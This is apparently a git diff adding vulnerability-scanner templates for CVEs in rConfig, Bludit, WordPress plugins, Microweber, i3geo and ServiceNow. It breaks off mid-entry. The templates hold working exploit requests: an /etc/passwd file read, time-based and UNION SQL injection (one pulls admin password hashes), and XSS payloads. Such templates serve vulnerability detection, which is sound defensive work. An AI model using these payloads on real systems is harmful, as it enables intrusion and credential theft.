b/http/cves/2021/CVE-2021-29006.yaml new file mode 100644 index 0000000000..29e583fc4a --- /dev/null +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -0,0 +1,54 @@ +id: CVE-2021-29006 +info: + name: rConfig 3.9.6 - Local File Inclusion + author: r3Y3r53 + severity: medium + description: | + rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server. + reference: + - https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py + - https://nvd.nist.gov/vuln/detail/CVE-2021-29006 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-29006 + cwe-id: CWE-22 + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2021,rconfig,authenticated,lfi + +http: + - raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /dashboard.php HTTP/1.1 + Host: {{Hostname}} + + - | + GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - 'root:.*:0:0:' + + - type: word + part: body_2 + words: + - 'rconfig' + + - type: status + part: header_3 + status: + - 200 diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml new file mode 100644 index 0000000000..0e5a4aa662 --- /dev/null +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-35323 +info: + name: Bludit 3.13.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login + remediation: Bludit v4.0.0 + reference: + - https://github.com/bludit/bludit/issues/1327 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-35323 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: title:"Bludit" + tags: cve,cve2021,bludit,xss + +http: + - raw: + - | + GET /bludit/admin/login HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 10s + POST /bludit/admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save= + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "") && contains(body_2, "Bludit")' + condition: and + + extractors: + - type: regex + name: tokenCSRF + part: body + group: 1 + regex: + - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' + internal: true diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml new file mode 100644 index 0000000000..fdabfa9bb5 --- /dev/null +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-0228 + +info: + name: Popup Builder < 4.0.7 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection. + remediation: update to v.4.0.7 + reference: + - https://wpscan.com/vulnerability/22facac2-52f4-4e5f-be59-1d2934b260d9 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-89 + cve-id: 2022-0228 + cpe: cpe:2.3:a:sygnoos:popup_builder:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + publicwww-query: "/wp-content/plugins/popup-builder/" + max-request: 1 + tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,popup-builder + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 15s + GET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=7' + - 'status_code_2 == 200' + - 'contains_all(body_2, "first name", "last name", "email")' + - 'contains(content_type_2, "application/octet-stream")' + condition: and diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml new file mode 100644 index 0000000000..b8bbd1ed95 --- /dev/null +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-0533 + +info: + name: Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability. + remediation: upgrade to v.3.0.15 + reference: + - https://wpscan.com/vulnerability/40f36692-c898-4441-ad24-2dc17856bd74 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0533 + - https://vulners.com/cve/CVE-2022-0533 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + publicwww-query: "/wp-content/plugins/ditty-news-ticker/" + tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains_all(body_2, "", "ditty")' + condition: and diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml new file mode 100644 index 0000000000..ad226b7d16 --- /dev/null +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-0651 + +info: + name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection + author: theamanrawat + severity: critical + description: | + The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. + remediation: Update wp-statistics plugin to version 13.1.6, or newer. + reference: + - https://wordpress.org/plugins/wp-statistics/ + - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0651 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0651 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + google-query: inurl:/wp-content/plugins/wp-statistics + tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp,wp-statistics + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 20s + GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home'-sleep(6)-'¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "application/json") + - contains(body, 'Visitor Hit was recorded successfully') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-zA-Z]+)' + internal: true diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml new file mode 100644 index 0000000000..edf0efdc45 --- /dev/null +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-0658 + +info: + name: CommonsBooking < 2.6.8 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection. + remediation: Fixed in version 2.6.8 + reference: + - https://wpscan.com/vulnerability/d7f0805a-61ce-454a-96fb-5ecacd767578 + - https://wordpress.org/plugins/commonsbooking/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0658 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0658 + cwe-id: CWE-89 + metadata: + verified: true + google-query: inurl:/wp-content/plugin/commonsbooking/ + max-request: 1 + tags: cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan + +http: + - raw: + - | + @timeout: 20s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3) + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(header, "application/json")' + - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")' + condition: and diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml new file mode 100644 index 0000000000..bc2ac15e1d --- /dev/null +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-0787 + +info: + name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection + author: theamanrawat + severity: critical + description: | + The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections. + remediation: Fixed in version 5.1 + reference: + - https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd + - https://wordpress.org/plugins/wp-limit-failed-login-attempts/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0787 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0787 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts + +http: + - raw: + - | + @timeout: 15s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU) + + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(all_headers, "text/html") + - contains(body, 'iTotalDisplayRecords') + condition: and diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml new file mode 100644 index 0000000000..2727dcb3e1 --- /dev/null +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-0814 + +info: + name: Ubigeo de Peru < 3.6.4 - SQL Injection + author: r3Y3r53 + severity: critical + description: | + The plugin does not properly sanitise and escape some parameters before using them in SQL statements via various AJAX actions, some of which are available to unauthenticated users, leading to SQL Injections. + reference: + - https://wpscan.com/vulnerability/fd84dc08-0079-4fcf-81c3-a61d652e3269 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0814 + - https://wordpress.org/plugins/ubigeo-peru/ + remediation: Fixed in version 3.6.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0814 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/ubigeo-peru/" + tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=rt_ubigeo_load_distritos_address&idProv=1%20UNION%20SELECT%201,(SELECT%20user_login%20FROM%20wp_users%20WHERE%20ID%20=%201),(SELECT%20user_pass%20FROM%20wp_users%20WHERE%20ID%20=%201)%20from%20wp_users# + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'idProv' + - 'idDist' + - 'distrito' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml new file mode 100644 index 0000000000..e81decdaa0 --- /dev/null +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-0899 + +info: + name: Header Footer Code Manager < 1.1.24 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Header Footer Code Manager WordPress plugin before 1.1.24 does not escape generated URLs before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/1772417a-1abb-4d97-9694-1254840defd1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0899 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0899 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,wp,wp-plugin,wordpress,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=hfcm-list&'> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "All Snippets")' + condition: and diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml new file mode 100644 index 0000000000..2951f0b581 --- /dev/null +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-2174 + +info: + name: microweber 1.2.18 - Cross-site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18. + reference: + - https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2174 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174 + - https://www.tenable.com/cve/CVE-2022-2174 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2022-2174 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,microweber,xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test" + + matchers: + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(body, "") && contains(body, "microweber")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml new file mode 100644 index 0000000000..02f0d35888 --- /dev/null +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-25148 + +info: + name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection + author: theamanrawat + severity: critical + description: | + The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_id parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. + remediation: Update wp-statistics plugin to version 13.1.6, or newer. + reference: + - https://wordpress.org/plugins/wp-statistics/ + - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25148 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + google-query: inurl:/wp-content/plugins/wp-statistics + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 15s + GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "application/json") + - contains(body, 'Visitor Hit was recorded successfully') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-zA-Z]+)' + internal: true diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml new file mode 100644 index 0000000000..90c1a08a98 --- /dev/null +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-25149 + +info: + name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection + author: theamanrawat + severity: critical + description: | + The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. + reference: + - https://wordpress.org/plugins/wp-statistics/ + - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-25149 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-25149 + cwe-id: CWE-89 + metadata: + max-request: 2 + verified: true + publicwww-query: "/wp-content/plugins/wp-statistics/" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 50s + GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "application/json") + - contains(body, 'Visitor Hit was recorded successfully') + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - '_wpnonce=([0-9a-zA-Z]+)' + internal: true diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml new file mode 100644 index 0000000000..9785f3c096 --- /dev/null +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-2535 + +info: + name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure + author: r3Y3r53 + severity: medium + description: | + The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink + remediation: Fixed in version 1.6.2 + reference: + - https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2535 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-2535 + cwe-id: CWE-639 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/" + tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "searchwp-live-search-result")' + condition: and diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml new file mode 100644 index 0000000000..7c2956dbb1 --- /dev/null +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-3142 + +info: + name: NEX-Forms Plugin < 7.9.7 - SQL Injection + author: r3Y3r53 + severity: high + description: | + The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings. + remediation: Fixed in version 7.9.7 + reference: + - https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328/ + - https://www.exploit-db.com/exploits/51042 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3142 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cwe-id: CWE-89 + cpe: cpe:2.3:a:basixonline:nex-forms:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + publicwww-query: "/wp-content/plugins/nex-forms-express-wp-form-builder/" + max-request: 1 + tags: cve,cve2022,wordpress,sqli,wp-plugin,wp,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + @timeout: 30s + GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)-- HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'status_code_2 == 200' + - 'contains(body_2, "NEX-Forms")' + - 'contains(content_type_2, "text/html")' + condition: and diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml new file mode 100644 index 0000000000..eaa50e0cdb --- /dev/null +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-3242 + +info: + name: Microweber <1.3.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2. + reference: + - https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/ + - https://www.tenable.com/cve/CVE-2022-3242 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3242 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:780351152 + tags: xss,cve,cve2023,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(tolower(body), "microweber")' + condition: and \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml new file mode 100644 index 0000000000..4cf46fb274 --- /dev/null +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-34093 + +info: + name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-34093 + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt#L44 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-34093 + cwe-id: CWE-79 + cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + tags: cve,cve2022,i3geo,xss + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' + condition: and diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml new file mode 100644 index 0000000000..d0d85e2cbd --- /dev/null +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-34094 + +info: + name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php. + reference: + - https://github.com/edmarmoretti/i3geo/issues/5 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34093 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-34094 + cwe-id: CWE-79 + cpe: cpe:2.3:a:i3geo_project:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + tags: cve,cve2022,i3geo,xss + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' + condition: and diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml new file mode 100644 index 0000000000..3ff9f20a3d --- /dev/null +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -0,0 +1,68 @@ +id: CVE-2022-39048 + +info: + name: ServiceNow - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems. + reference: + - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892 + - https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-39048 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-39048 + cwe-id: CWE-79 + metadata: + max-request: 3 + verified: true + shodan-query: http.title:"ServiceNow" + tags: cve,cve2022,xss,servicenow,authenticated + +http: + - raw: + - | + GET /navpage.do HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login.do HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}¬_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do + + - | + GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"' + - 'assessment_list.do' + condition: and + + - type: word + part: header_3 + words: + - 'text/html' + + - type: status + part: header_3 + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' + internal: true diff --git a/http/cves/2022/CVE-2022-40032.yaml b/http/cves/2022/CVE-2022-40032.yaml new file mode 100644 index 0000000000..2f056c8411 --- /dev/null +++ b/http/cves/2022/CVE-2022-40032.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-40032 + +info: + name: Simple Task Managing 